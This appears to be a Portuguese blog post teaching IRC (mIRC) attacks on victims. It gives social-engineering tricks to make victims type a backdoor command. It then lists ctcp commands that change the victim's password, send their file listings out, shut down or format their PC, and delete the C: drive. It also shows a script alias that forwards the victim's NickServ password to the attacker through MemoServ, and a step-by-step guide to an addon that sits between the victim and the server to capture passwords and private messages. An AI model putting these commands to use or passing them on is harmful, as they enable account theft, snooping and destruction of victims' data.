------------------1
Consiste em convencer a vítima digitar o seguinte comando:
//write ^ ctcp *:^:$2- | /.load -rs ^
Esse comando abre um backdoor no script da pessoa deixando ela vulnerável a comandos remotos
no IRC, como esse comando atinge apenas o script se a pessoa trocar de script, você não consegue
mais ataca-la.
Como atacar a vítima por esse backdoor?
/ctcp nickdavítima ^ comando
Se o nick da vítima for _giNK_ por exemplo, e você quer trocar a senha dele para qualquer coisa que vc quiser eh soh vc digitar a senha nova ae, onde esta escrito SENHA NOVA
basta digitar o seguinte comando:
/ctcp _giNK_ ^ nickserv set password SENHA NOVA
Abaixo segue uma lista de comandos para você utilizar neste ataque:
· Ver os arquivos da vítima listados
/ctcp Cachopa_ /alias list return $findfir(c:,*.*,write C:\Windows\Desktop\dir.txt $1-)
/ctcp Cachopa_ /list
/ctcp Cachopa_ /dcc send nick C:\Windows\Desktop\dir.txt
/ctcp Cachopa_ /dcc send nick -p C:\Windows\Desktop\dir.txt
· Desligar o PC da vítima
/ctcp nick /run C:\WINDOWS\RUNDLL32.EXE shell32,SHExitWindowsEx
ou
/ctcp nick /run c:/windows/rundll.exe user.exe,exitwindows
· Executar arquivos com determinado número de vezes:
/ctcp nick //%x = 1 | while %x <>
/ctcp nick //%x = 1 | while %x > 0 { run c:\windows\notepad.exe $+(c:\n,%x) | inc %x }
· Formatar o PC da vítima:
/ctcp nick /run command format c:
e
/ctcp nick //return $findfile(c:,*.*,0,.remove $1-)
ou
/ctcp nick /run deltree /y C:\
2º SENHA POR MEMOSERV
Esse é um método muito simples, consiste em você convencer a vítima a digitar esse comando:
/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send seunick Senha
de $me $+ : $2- | nickserv $1-
*No lugar de “seu nick” você coloca o seu nick por exemplo se seu nick for surfista_loko:
/ctcp nick ^ /.alias nickserv if ($1 == identify) /.raw -q memoserv send
surfista_loko Senha de $me $+ : $2- | nickserv $1-
Após a vítima digitar esse comando, você pode descansar que em algum tempinho
a senha dele estará no seu memoserv.
------------------------------------2
Addons
Addons são mini-programas, com rotinas programadas para fazerem determinada ação em seu script como por exemplo colocar um onotice, um auto-color, mas o que nos interessa mesmo são os addons de guerra como são chamados. Eles podem se dividir em 3 sub-grupos:
• Addons de Guerra Remotos
Eles ficam alojados no PC da vítima, mas só são realmente perigosos se forem carregados no script da vítima, é como um server de um trojan se a pessoa abrir... BUM! Está vulnerável, se não abrir então está livre dos ataques daquele trojan, assim funciona também os addons remotos, se a pessoa carregar o addon com o seguinte comando então ele se aloja no script dela:
/load -rs nomedoarquivo.extensão
Ex. /load -rs sinisters.mrc
Depois da pessoa carregar o addon ela está completamente vulnerável aos ataques que o addon possibilita, a partir daí você faz o que quiser, aqui não tem como eu explicar como se usa addons, cada qual tem seu manual e seu jeito de funcionar, geralmente o manual vem junto com o addon.
• Addons Locais e Remotos
Esses são uma mistura dos dois acima, é como um trojan também, o addon local você usa para atacar(como o client de um trojan), e o remoto, você envia para vítima(como o server).
Esses são os métodos mais comuns utilizados por “réckers” do IRC.
Addon Exemplo(Mirc Server Spy)
Abaixo explicaremos como utilizar um Addon muito conhecido e muito utilizado atualmente no IRC para se roubar nicks, o Mirc Server Spy, ele age como um intermediário entre a vítima e o servidor, ou seja, tudo que a vítima digitar(comandos, pvt’s, etc) passarão por você antes de chegar ao servidor, assim você poderá pegar senhas, e descobrir o que a vítima anda falando em pvts e chats, funciona como um keylogger remoto mas só para o IRC.
Siga os passos para instala-lo em seu script:
1. Baixe o Addon em http://www.h2ksite.rg3.net/ (este site não existe mais, entrei em contato com o "Mendigo" para ver onde o Addon pode ser encontrado; assim que tiver resposta corrijo esta pequena falha)
2. Extraia-o do WinZip ou outro programa de extração e coloque-o na pasta principal do seu script(ex c:/mIRC)
3. Abra seu script e digite: /load -rs mirc_server_spy.mrc
Após instalado o addon estara aguardando para ser chamado, abaixo um explicação de como abri-lo e também de seus botões e comandos.
Para abrir o addon basta digitar /msv
Após digitar o comando uma janela se abre, abaixo uma rápida explicação dela:
1- Server(Padrão: irc.Barretos.com.br): Quando a pessoa se conectar ao seu IP ela entrara pelo server descrito na caixa de texto(deve ser um servidor válido)
2- Ligar: Liga o servidor que muda o Status(ver nº 7) para “Servidor Ligado”
3- Desligar: Desliga o servidor que muda o Status(ver nº 7) para “Servidor Desligado”
4- Limpar: Limpa a tela(ver nº 8)
5- Reiniciar: Reinicia o Servidor, ou seja, desliga e liga-o novamente(a sua vítima caíra dele)
6- Sair/desconectar: Desliga o servidor, e/ou sai do programa
7- Status: Informa o Status do Servidor(Ligado ou Desligado)
8- Tela: fica gravado tudo que a vítima digitou.
Abaixo explicaremos passo-a-passo como usá-lo:
1- Após abrir o programa digitando /msv digite um server valido ou deixe o padrão(irc.Barretos.com.Br)
2- Clique no botão “Ligar” para ligar o Server
3- Peça para a vítima digitar o comando /server “seu ip”(ex: /server 200.199.198.197)
4- Depois disso é só olhar a Tela que aparecerá tudo que a vítima digitou.
0 comentários:
Postar um comentário